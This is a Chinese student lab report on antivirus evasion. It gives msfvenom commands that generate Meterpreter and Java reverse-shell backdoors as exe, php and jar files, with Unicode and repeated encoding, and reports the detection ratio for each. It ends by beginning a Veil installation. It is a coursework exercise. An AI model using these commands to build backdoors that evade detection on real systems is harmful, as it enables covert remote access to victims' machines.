EXP3-免杀原理与实践

基础问题问答

1.1 杀软是如何检测出恶意代码的？

1.2 免杀是做什么？

1.3 免杀的基本方法有哪些？

实践内容

正确使用msf编码器，使用msfvenom生成如jar之类的其他文件

检测直接生成的后门exe文件（实验二中的后门程序）
检出率为54/70

使用Unicode编码
msfvenom -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed -b ‘\x00’ LHOST=10.0.2.15 LPORT=1214 -f exe > backdoor1.exe
检出率54/70

编码多次

msfvenom -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed -i -10 -b ‘\x00’ LHOST=192.168.40.128 LPORT=11310 -f exe > backdoor2.exe

检出率：53/70
和李烨龙同学的结果有所不同，我编码多次得出的程序其检出率似乎并没有明显变化

利用php格式文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.40.128 LPORT=11310 x> backdoor_php.php

检出率：22/57
相较之前检出率明显下降

利用jar文件
msfvenom -p java/shell_reverse_tcp LHOST=192.168.40.128 LPORT=11310 -f jar > backdoor_jar.jar

检出率：32/60

加壳工具实践veil

安装

sudo apt-get install veil-evasion

修改setup.sh

标签：exe,免杀,LHOST,EXP3,检出率,jar,实践,tcp,msfvenom
来源： https://www.cnblogs.com/kuohao1214/p/16103841.html